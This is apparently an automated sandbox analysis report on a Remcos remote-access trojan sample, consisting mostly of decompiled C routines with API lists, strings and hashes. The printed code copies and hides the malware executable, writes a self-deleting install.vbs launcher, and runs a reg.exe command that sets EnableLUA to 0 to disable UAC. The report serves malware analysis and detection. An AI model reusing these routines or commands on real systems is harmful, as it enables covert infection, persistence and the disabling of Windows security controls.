                                                                                                0x0040ca73
                                                                                                0x0040ca75
                                                                                                0x0040ca7a
                                                                                                0x0040ca80
                                                                                                0x0040ca92
                                                                                                0x0040ca95
                                                                                                0x0040ca97
                                                                                                0x0040ca97
                                                                                                0x0040cab4
                                                                                                0x0040cab6
                                                                                                0x0040caba
                                                                                                0x0040cac1
                                                                                                0x0040cacb
                                                                                                0x0040cad2
                                                                                                0x0040cad4
                                                                                                0x0040cad9
                                                                                                0x0040cadf
                                                                                                0x0040caeb
                                                                                                0x0040caee
                                                                                                0x0040caf0
                                                                                                0x0040caf0
                                                                                                0x0040cb05
                                                                                                0x0040cb07
                                                                                                0x0040cb0d
                                                                                                0x0040cb1a
                                                                                                0x0040cb2f
                                                                                                0x0040cb34
                                                                                                0x0040cb47
                                                                                                0x0040cb50
                                                                                                0x0040cb55
                                                                                                0x0040cb61
                                                                                                0x0040cb63
                                                                                                0x0040cb63
                                                                                                0x0040cb78
                                                                                                0x0040cb7a
                                                                                                0x0040cb93
                                                                                                0x0040cba2
                                                                                                0x0040cba7
                                                                                                0x0040cbaa
                                                                                                0x0040cbad
                                                                                                0x0040cbb0
                                                                                                0x0040cbb0
                                                                                                0x0040cbc4
                                                                                                0x0040cbc9
                                                                                                0x0040cbcd
                                                                                                0x0040cbd2
                                                                                                0x0040cbd7
                                                                                                0x0040cbd9
                                                                                                0x0040cbdb
                                                                                                0x0040cbde
                                                                                                0x0040cbde
                                                                                                0x0040cbea
                                                                                                0x0040cbec
                                                                                                0x0040cbf3
                                                                                                0x0040cbff
                                                                                                0x0040cbff
                                                                                                0x0040cc01
                                                                                                0x0040cc08

                                                                                                APIs
                                                                                                • OpenMutexA.KERNEL32 ref: 0040C495
                                                                                                • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C4A7
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040C4AE
                                                                                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 0040C50D
                                                                                                • GetLastError.KERNEL32 ref: 0040C513
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\rem9090sta.exe,00000104), ref: 0040C534
                                                                                                  • Part of subcall function 0040E905: __EH_prolog.LIBCMT ref: 0040E90A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
                                                                                                • String ID: (32 bit)$ (64 bit)$0f$Access Level: $Administrator$C:\Users\user\AppData\Local\Temp\rem9090sta.exe$Exe$Exe$Inj$ProductName$Remcos Agent initialized$Remcos-36FQQT$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$User$exepath$hpg$licence$license_code.txt$origmsc$pf$x(f
                                                                                                • API String ID: 1247502528-3844880028
                                                                                                • Opcode ID: 5ac75c2e02a552ee0e0f7491615d2c369b391271644b622b10bd505384b3a1d6
                                                                                                • Instruction ID: a0e48df29832305806efb2b49378476c8b0d2fe6d91567894ced15b4f1c176e2
                                                                                                • Opcode Fuzzy Hash: 5ac75c2e02a552ee0e0f7491615d2c369b391271644b622b10bd505384b3a1d6
                                                                                                • Instruction Fuzzy Hash: 7D32C7A0B042416BDB1577768C97B3E25998F81748F14053FF842BB2E2EEBC4D46839E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0043060E() {
                                                                                                				_Unknown_base(*)()* _t1;
                                                                                                
                                                                                                				_t1 = SetUnhandledExceptionFilter(E0043061A); // executed
                                                                                                				return _t1;
                                                                                                			}




                                                                                                0x00430613
                                                                                                0x00430619

                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_0003061A,004302FD), ref: 00430613
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: f64ca50f8ca8c96064be5bf3767f0d5dfdc7d9965405c52fc8f0cd8c4cf5388a
                                                                                                • Instruction ID: 2b8caaebd9721374acd760d330e640496e57b004c21848727b2dd92476e4fa8c
                                                                                                • Opcode Fuzzy Hash: f64ca50f8ca8c96064be5bf3767f0d5dfdc7d9965405c52fc8f0cd8c4cf5388a
                                                                                                • Instruction Fuzzy Hash:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 95%
                                                                                                			E0040A9AB(char __ecx, intOrPtr* __edx, WCHAR* _a4, char _a8, char _a12) {
                                                                                                				char _v9;
                                                                                                				int _v20;
                                                                                                				char _v44;
                                                                                                				char _v68;
                                                                                                				char _v92;
                                                                                                				char _v116;
                                                                                                				char _v140;
                                                                                                				char _v164;
                                                                                                				char _v188;
                                                                                                				char _v212;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				intOrPtr _t62;
                                                                                                				void* _t63;
                                                                                                				signed int _t67;
                                                                                                				signed int _t68;
                                                                                                				int _t70;
                                                                                                				void* _t79;
                                                                                                				void* _t91;
                                                                                                				void* _t92;
                                                                                                				int _t94;
                                                                                                				void* _t99;
                                                                                                				void* _t100;
                                                                                                				WCHAR* _t113;
                                                                                                				int _t115;
                                                                                                				intOrPtr _t118;
                                                                                                				WCHAR* _t123;
                                                                                                				int _t124;
                                                                                                				void* _t139;
                                                                                                				intOrPtr* _t152;
                                                                                                				int _t153;
                                                                                                				intOrPtr* _t207;
                                                                                                				int _t208;
                                                                                                				intOrPtr* _t235;
                                                                                                				void* _t236;
                                                                                                				void* _t239;
                                                                                                				void* _t249;
                                                                                                				void* _t250;
                                                                                                				intOrPtr _t254;
                                                                                                				void* _t257;
                                                                                                				void* _t259;
                                                                                                				intOrPtr* _t260;
                                                                                                
                                                                                                				_t235 = __edx;
                                                                                                				_v9 = __ecx;
                                                                                                				_t260 = __edx;
                                                                                                				_v20 = 0;
                                                                                                				_t257 = __edx + 2;
                                                                                                				do {
                                                                                                					_t62 =  *_t235;
                                                                                                					_t235 = _t235 + 2;
                                                                                                				} while (_t62 != 0);
                                                                                                				_t236 = _t235 - _t257;
                                                                                                				_t268 = _t236;
                                                                                                				if(_t236 == 0) {
                                                                                                					_t143 = _a4;
                                                                                                					_t238 = __ecx;
                                                                                                					_t63 = E00418A4B( &_v92, __ecx, _t143);
                                                                                                					_t259 = 0x46e590;
                                                                                                					E00401EEC(0x46e590, _t238, _t260, _t63);
                                                                                                				} else {
                                                                                                					CreateDirectoryW(E00401EDD(0x46e5c0), 0); // executed
                                                                                                					_t143 = _a4;
                                                                                                					_t139 = E00403098(_t143,  &_v92, E00407677( &_v44, 0x46e5c0, _t268, "\\"), 0x46e5c0, _t268, _t143);
                                                                                                					_t259 = 0x46e590;
                                                                                                					E00401EEC(0x46e590, _t138, _t260, _t139);
                                                                                                					E00401EE2();
                                                                                                				}
                                                                                                				E00401EE2();
                                                                                                				_t152 = E00401EDD(_t259);
                                                                                                				_t67 = 0x46daf8;
                                                                                                				while(1) {
                                                                                                					_t239 =  *_t67;
                                                                                                					if(_t239 !=  *_t152) {
                                                                                                						break;
                                                                                                					}
                                                                                                					if(_t239 == 0) {
                                                                                                						L10:
                                                                                                						_t153 = 0;
                                                                                                						_t68 = 0;
                                                                                                						L12:
                                                                                                						if(_t68 != 0) {
                                                                                                							_t70 = CopyFileW("C:\Users\jones\AppData\Local\Temp\rem9090sta.exe", E00401EDD(_t259), _t153); // executed
                                                                                                							__eflags = _t70;
                                                                                                							if(_t70 != 0) {
                                                                                                								L23:
                                                                                                								E0040A8BA(0x46e578, E00401EDD(0x46e578)); // executed
                                                                                                								__eflags = _a8 - 1;
                                                                                                								_pop(_t157);
                                                                                                								if(__eflags != 0) {
                                                                                                									L28:
                                                                                                									E00403098(_t143,  &_v92, E00404260(_t143,  &_v68, E00437AEF(_t143, _t157, __eflags, L"Temp")), _t259, __eflags, L"\\install.vbs");
                                                                                                									E00401EE2();
                                                                                                									E00404260(_t143,  &_v44, L"WScript.Sleep 1000\n");
                                                                                                									E0040778C(_t143,  &_v44, _t259, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
                                                                                                									__eflags = _a12 - 1;
                                                                                                									_t144 = "\n";
                                                                                                									if(__eflags == 0) {
                                                                                                										_t100 = E00404260("\n",  &_v212, "C:\Users\jones\AppData\Local\Temp\rem9090sta.exe");
                                                                                                										E00403303(E00403098(_t144,  &_v68, E00403098(_t144,  &_v116, E00403022( &_v140, E00403098(_t144,  &_v164, E00404260("\n",  &_v188, L"fso.DeleteFile "), _t259, __eflags, "\""), _t100), _t259, __eflags, "\""), _t259, __eflags, _t144));
                                                                                                										E00401EE2();
                                                                                                										E00401EE2();
                                                                                                										E00401EE2();
                                                                                                										E00401EE2();
                                                                                                										E00401EE2();
                                                                                                										E00401EE2();
                                                                                                									}
                                                                                                									_t79 = E00404260(_t144,  &_v116, L"\"\"\", 0");
                                                                                                									E00403303(E00403098(_t144,  &_v212, E00403022( &_v188, E0040440A(_t144,  &_v164, E00404260(_t144,  &_v68, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), __eflags, _t259), _t79), _t259, __eflags, _t144));
                                                                                                									E00401EE2();
                                                                                                									E00401EE2();
                                                                                                									E00401EE2();
                                                                                                									E00401EE2();
                                                                                                									E00401EE2();
                                                                                                									E0040778C(_t144,  &_v44, _t259, L"fso.DeleteFile(Wscript.ScriptFullName)");
                                                                                                									_t91 = E00401EDD( &_v92);
                                                                                                									_t92 = E0040247B();
                                                                                                									_t94 = E00418337(E00401EDD( &_v44), _t92 + _t92, _t91, 0); // executed
                                                                                                									__eflags = _t94;
                                                                                                									if(_t94 == 0) {
                                                                                                										L33:
                                                                                                										E00401EE2();
                                                                                                										return E00401EE2();
                                                                                                									} else {
                                                                                                										_t99 = ShellExecuteW(0, L"open", E00401EDD( &_v92), 0x46079c, 0x46079c, 0); // executed
                                                                                                										__eflags = _t99 - 0x20;
                                                                                                										if(_t99 <= 0x20) {
                                                                                                											goto L33;
                                                                                                										}
                                                                                                										ExitProcess(0); // executed
                                                                                                									}
                                                                                                								}
                                                                                                								_t113 = E00401EDD(_t259);
                                                                                                								_t143 = SetFileAttributesW;
                                                                                                								SetFileAttributesW(_t113, 7);
                                                                                                								_t249 = _t260 + 2;
                                                                                                								_t157 = 0;
                                                                                                								__eflags = 0;
                                                                                                								do {
                                                                                                									_t115 =  *_t260;
                                                                                                									_t260 = _t260 + 2;
                                                                                                									__eflags = _t115;
                                                                                                								} while (_t115 != 0);
                                                                                                								__eflags = _t260 - _t249;
                                                                                                								if(__eflags != 0) {
                                                                                                									_t157 = 0x46e5c0;
                                                                                                									SetFileAttributesW(E00401EDD(0x46e5c0), 7);
                                                                                                								}
                                                                                                								goto L28;
                                                                                                							}
                                                                                                							__eflags = _v9 - 0x36;
                                                                                                							if(_v9 == 0x36) {
                                                                                                								goto L23;
                                                                                                							}
                                                                                                							_t207 = _t260;
                                                                                                							_t250 = _t207 + 2;
                                                                                                							do {
                                                                                                								_t118 =  *_t207;
                                                                                                								_t207 = _t207 + 2;
                                                                                                								__eflags = _t118 - _v20;
                                                                                                							} while (_t118 != _v20);
                                                                                                							_t208 = _t207 - _t250;
                                                                                                							__eflags = _t208;
                                                                                                							_push(_t143);
                                                                                                							if(_t208 == 0) {
                                                                                                								E00401EEC(_t259, 0x36, _t260, E00418A4B( &_v68, 0x36));
                                                                                                							} else {
                                                                                                								E00401EEC(_t259, _t128, _t260, E00403098(_t143,  &_v140, E00403098(_t143,  &_v116, E00418A4B( &_v68, 0x36, _t260), _t259, __eflags, "\\"), _t259, __eflags));
                                                                                                								E00401EE2();
                                                                                                								E00401EE2();
                                                                                                							}
                                                                                                							E00401EE2();
                                                                                                							_t123 = E00401EDD(_t259);
                                                                                                							_t143 = 0x46daf8;
                                                                                                							_t124 = CopyFileW(0x46daf8, _t123, 0);
                                                                                                							__eflags = _t124;
                                                                                                							if(_t124 != 0) {
                                                                                                								goto L23;
                                                                                                							} else {
                                                                                                								E00409DFE(0x46daf8, _t259, 0x46daf8);
                                                                                                								return 0;
                                                                                                							}
                                                                                                						}
                                                                                                						E0040A8BA(0x46e578, E00401EDD(0x46e578));
                                                                                                						return 1;
                                                                                                					}
                                                                                                					_t254 =  *((intOrPtr*)(_t67 + 2));
                                                                                                					if(_t254 !=  *((intOrPtr*)(_t152 + 2))) {
                                                                                                						break;
                                                                                                					}
                                                                                                					_t67 = _t67 + 4;
                                                                                                					_t152 = _t152 + 4;
                                                                                                					if(_t254 != 0) {
                                                                                                						continue;
                                                                                                					}
                                                                                                					goto L10;
                                                                                                				}
                                                                                                				asm("sbb eax, eax");
                                                                                                				_t68 = _t67 | 0x00000001;
                                                                                                				_t153 = 0;
                                                                                                				__eflags = 0;
                                                                                                				goto L12;
                                                                                                			}


                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 0040A9E3
                                                                                                • CopyFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\rem9090sta.exe,00000000,00000000,00000000), ref: 0040AAAF
                                                                                                • CopyFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\rem9090sta.exe,00000000,00000000,00000000), ref: 0040AB4D
                                                                                                  • Part of subcall function 00418A4B: GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 00418BA2
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040AB8F
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040ABB4
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,0046079C,0046079C,00000000), ref: 0040AD7F
                                                                                                • ExitProcess.KERNEL32 ref: 0040AD8B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCopy$CreateDirectoryExecuteExitLongNamePathProcessShell
                                                                                                • String ID: """, 0$0f$6$C:\Users\user\AppData\Local\Temp\rem9090sta.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$x(f
                                                                                                • API String ID: 4018752923-1211673646
                                                                                                • Opcode ID: 929338f2029b4603b5cd494d6fbd571c9dcb1f4256eaf60fc116593e2e5a409c
                                                                                                • Instruction ID: 718e270501081baa5576db078e4b8e6ac0fd87abbbcd0a0dfe3fb1673bde29fb
                                                                                                • Opcode Fuzzy Hash: 929338f2029b4603b5cd494d6fbd571c9dcb1f4256eaf60fc116593e2e5a409c
                                                                                                • Instruction Fuzzy Hash: 28A1A271A0020856CB18FBA6CC92AEE7369AF54308F54447FF506B71E2EE3C5E46C65E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 84%
                                                                                                			E00418A4B(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                				char _v524;
                                                                                                				char _v544;
                                                                                                				char _v560;
                                                                                                				char _v572;
                                                                                                				void* _v576;
                                                                                                				char _v580;
                                                                                                				char _v584;
                                                                                                				char _v600;
                                                                                                				char _v608;
                                                                                                				char _v616;
                                                                                                				char _v620;
                                                                                                				void* _v624;
                                                                                                				char _v628;
                                                                                                				char _v632;
                                                                                                				char _v636;
                                                                                                				char _v644;
                                                                                                				void* _v648;
                                                                                                				char _v652;
                                                                                                				void* _v672;
                                                                                                				void* __ebx;
                                                                                                				signed int _t36;
                                                                                                				void* _t39;
                                                                                                				void* _t40;
                                                                                                				void* _t77;
                                                                                                
                                                                                                				_t73 = __edx;
                                                                                                				_t77 = __ecx;
                                                                                                				_t54 = __edx;
                                                                                                				E00401F5F(__edx,  &_v644);
                                                                                                				_t36 = __edx + 0xffffffd0;
                                                                                                				_t85 = _t36 - 7;
                                                                                                				if(_t36 <= 7) {
                                                                                                					switch( *((intOrPtr*)(_t36 * 4 +  &M00418C27))) {
                                                                                                						case 0:
                                                                                                							_push(L"Temp");
                                                                                                							goto L14;
                                                                                                						case 1:
                                                                                                							__ecx =  &_v620;
                                                                                                							__eax = E00417735(__ebx,  &_v620);
                                                                                                							__ecx =  &_v644;
                                                                                                							__eax = E00401EEC( &_v644, __edx, __esi, __eax);
                                                                                                							goto L4;
                                                                                                						case 2:
                                                                                                							_push(L"SystemDrive");
                                                                                                							goto L14;
                                                                                                						case 3:
                                                                                                							_push(L"WinDir");
                                                                                                							goto L14;
                                                                                                						case 4:
                                                                                                							__eax = E00418004(__ecx);
                                                                                                							__eflags = __al;
                                                                                                							if(__eflags != 0) {
                                                                                                								__ecx =  &_v620;
                                                                                                								E00404260(__ebx, __ecx, L"\\SysWOW64") = E00437AEF(__ebx, __ecx, __eflags, L"WinDir");
                                                                                                								__ecx =  &_v600;
                                                                                                								__edx = __eax;
                                                                                                								__ecx =  &_v580;
                                                                                                								__eax = E00403022( &_v580, __edx, __eax);
                                                                                                								__ecx =  &_v652;
                                                                                                								__eax = E00401EEC( &_v652, __edx, __esi, __eax);
                                                                                                								__ecx =  &_v584;
                                                                                                								__eax = E00401EE2();
                                                                                                								__ecx =  &_v608;
                                                                                                								__eax = E00401EE2();
                                                                                                								L4:
                                                                                                								__ecx =  &_v620;
                                                                                                								goto L5;
                                                                                                							} else {
                                                                                                								__ecx =  &_v572;
                                                                                                								E00404260(__ebx, __ecx, L"\\system32") = E00437AEF(__ebx, __ecx, __eflags, L"WinDir");
                                                                                                								__ecx =  &_v600;
                                                                                                								__edx = __eax;
                                                                                                								__ecx =  &_v628;
                                                                                                								__eax = E00403022( &_v628, __edx, __eax);
                                                                                                								__ecx =  &_v652;
                                                                                                								__eax = E00401EEC( &_v652, __edx, __esi, __eax);
                                                                                                								__ecx =  &_v632;
                                                                                                								__eax = E00401EE2();
                                                                                                								__ecx =  &_v608;
                                                                                                								__eax = E00401EE2();
                                                                                                								__ecx =  &_v584;
                                                                                                								L5:
                                                                                                								__eax = E00401EE2();
                                                                                                								goto L15;
                                                                                                							}
                                                                                                							L16:
                                                                                                						case 5:
                                                                                                							_push(L"ProgramFiles");
                                                                                                							goto L14;
                                                                                                						case 6:
                                                                                                							_push(L"AppData");
                                                                                                							goto L14;
                                                                                                						case 7:
                                                                                                							_push(L"UserProfile");
                                                                                                							L14:
                                                                                                							E00409DFE(_t54,  &_v644, E00437AEF(_t54, _t57, _t85));
                                                                                                							goto L15;
                                                                                                					}
                                                                                                				}
                                                                                                				L15:
                                                                                                				__imp__GetLongPathNameW(E00401EDD( &_v644),  &_v524, 0x208); // executed
                                                                                                				_t39 = E00404260(_t54,  &_v560, _a4);
                                                                                                				_t40 = E00404260(_t54,  &_v636, "\\");
                                                                                                				E00403022(_t77, E00403022( &_v600, E00418E53(_t54,  &_v616, _t73, _t85,  &_v544, _t38), _t40), _t39);
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				return _t77;
                                                                                                				goto L16;
                                                                                                			}

                                                                                                APIs
                                                                                                • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 00418BA2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LongNamePath
                                                                                                • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                • API String ID: 82841172-1609423294
                                                                                                • Opcode ID: 403aaa19e8e3832581e2f361f1f9deb2c97c10288c25cb5da4145e137c14fbc2
                                                                                                • Instruction ID: 51d1d3d7f88e16350ab95fa1488b961238f34f6f337266a5881a7e711dea3616
                                                                                                • Opcode Fuzzy Hash: 403aaa19e8e3832581e2f361f1f9deb2c97c10288c25cb5da4145e137c14fbc2
                                                                                                • Instruction Fuzzy Hash: 754104711082059AC244FB61DC92DEF77ACEF90759F20093FF546620E1EE78AA49C69F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 50%
                                                                                                			E0040D441() {
                                                                                                				struct _PROCESS_INFORMATION _v20;
                                                                                                				struct _STARTUPINFOA _v92;
                                                                                                				void* __edi;
                                                                                                				void* _t17;
                                                                                                				long _t19;
                                                                                                
                                                                                                				_t19 = 0x44;
                                                                                                				E00432D80(_t17,  &_v92, 0, _t19);
                                                                                                				_v92.cb = _t19;
                                                                                                				asm("stosd");
                                                                                                				asm("stosd");
                                                                                                				asm("stosd");
                                                                                                				asm("stosd");
                                                                                                				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v20); // executed
                                                                                                				CloseHandle(_v20);
                                                                                                				return CloseHandle(_v20.hThread);
                                                                                                			}

                                                                                                APIs
                                                                                                • CreateProcessA.KERNELBASE(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,0040C61F,00000000,hpg,00000001), ref: 0040D485
                                                                                                • CloseHandle.KERNEL32(0040C61F), ref: 0040D494
                                                                                                • CloseHandle.KERNEL32(00000027), ref: 0040D499
                                                                                                Strings
                                                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040D47B
                                                                                                • hpg, xrefs: 0040D448
                                                                                                • C:\Windows\System32\cmd.exe, xrefs: 0040D480
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$CreateProcess
                                                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$hpg
                                                                                                • API String ID: 2922976086-1189185850
                                                                                                • Opcode ID: 2e2118817e8f502acfdd2e1190e306bd04eabddef8fd273a438d7d6f01bfe287
                                                                                                • Instruction ID: a3a3fe32f90edc64badf12bfe715de2fb6dc2482f279f9e2a3132b0cdf50f1a9
                                                                                                • Opcode Fuzzy Hash: 2e2118817e8f502acfdd2e1190e306bd04eabddef8fd273a438d7d6f01bfe287
                                                                                                • Instruction Fuzzy Hash: 2BF012B290022C7EEB105AE9EC85EEFBB7CEB44795F140476F604E6020D5705D1486A5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00410A5F(char* __edx, char* _a4, char* _a8, int _a12, intOrPtr _a16, char _a20) {
                                                                                                				void* _v12;
                                                                                                				char _v1040;
                                                                                                				long _t14;
                                                                                                				long _t17;
                                                                                                
                                                                                                				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v12); // executed
                                                                                                				if(_t14 != 0) {
                                                                                                					L3:
                                                                                                					return 0;
                                                                                                				}
                                                                                                				_t17 = RegQueryValueExA(_v12, _a4, 0, 0, _a8,  &_a12);
                                                                                                				RegCloseKey(_v12);
                                                                                                				if(_t17 != 0) {
                                                                                                					goto L3;
                                                                                                				}
                                                                                                				_t7 =  &_a20; // 0x406267
                                                                                                				E00405C28( &_v1040, _a16,  *_t7);
                                                                                                				E00405CAF( &_v1040, _a8, _a12);
                                                                                                				return 1;
                                                                                                			}








                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00410A7B
                                                                                                • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00410A94
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00410A9F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID: gb@$origmsc
                                                                                                • API String ID: 3677997916-4256530773
                                                                                                • Opcode ID: 1823a53dad216f1a30dafc6634c61693494ed829d6671228afa21b7da06727f8
                                                                                                • Instruction ID: 9a2dbdcb9e407d08664f94aa67f999e944967ad6c11b9f4ee351b82bfcc4cd16
                                                                                                • Opcode Fuzzy Hash: 1823a53dad216f1a30dafc6634c61693494ed829d6671228afa21b7da06727f8
                                                                                                • Instruction Fuzzy Hash: 8701A93280022CBBCF219FA1DC08DEF7F38EF557A5F004065BA0862061E67589A5EBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 91%
                                                                                                			E00418337(void* __ecx, long __edx, WCHAR* _a4, long _a8) {
                                                                                                				void* _v8;
                                                                                                				long _v12;
                                                                                                				long _t10;
                                                                                                				long _t11;
                                                                                                				void* _t12;
                                                                                                				int _t14;
                                                                                                				struct _OVERLAPPED* _t16;
                                                                                                				struct _OVERLAPPED* _t21;
                                                                                                				long _t24;
                                                                                                				long _t27;
                                                                                                				void* _t30;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_push(__ecx);
                                                                                                				_t21 = 0;
                                                                                                				_v8 = __ecx;
                                                                                                				_t27 = __edx;
                                                                                                				_t10 = _a8;
                                                                                                				if(_t10 == 0) {
                                                                                                					_t11 = 0x40000000;
                                                                                                					_t24 = 2;
                                                                                                				} else {
                                                                                                					if(_t10 != 1) {
                                                                                                						_t11 = _a8;
                                                                                                						_t24 = _a8;
                                                                                                					} else {
                                                                                                						_t11 = 4;
                                                                                                						_t24 = _t11;
                                                                                                					}
                                                                                                				}
                                                                                                				_t12 = CreateFileW(_a4, _t11, _t21, _t21, _t24, 0x80, _t21); // executed
                                                                                                				_t30 = _t12;
                                                                                                				if(_t30 != 0xffffffff) {
                                                                                                					if(_a8 != 1 || SetFilePointer(_t30, _t21, _t21, 2) != 0xffffffff) {
                                                                                                						_t14 = WriteFile(_t30, _v8, _t27,  &_v12, _t21); // executed
                                                                                                						if(_t14 != 0) {
                                                                                                							_t21 = 1;
                                                                                                						}
                                                                                                						CloseHandle(_t30);
                                                                                                						_t16 = _t21;
                                                                                                						goto L13;
                                                                                                					} else {
                                                                                                						CloseHandle(_t30);
                                                                                                						goto L6;
                                                                                                					}
                                                                                                				} else {
                                                                                                					L6:
                                                                                                					_t16 = 0;
                                                                                                					L13:
                                                                                                					return _t16;
                                                                                                				}
                                                                                                			}















                                                                                                APIs
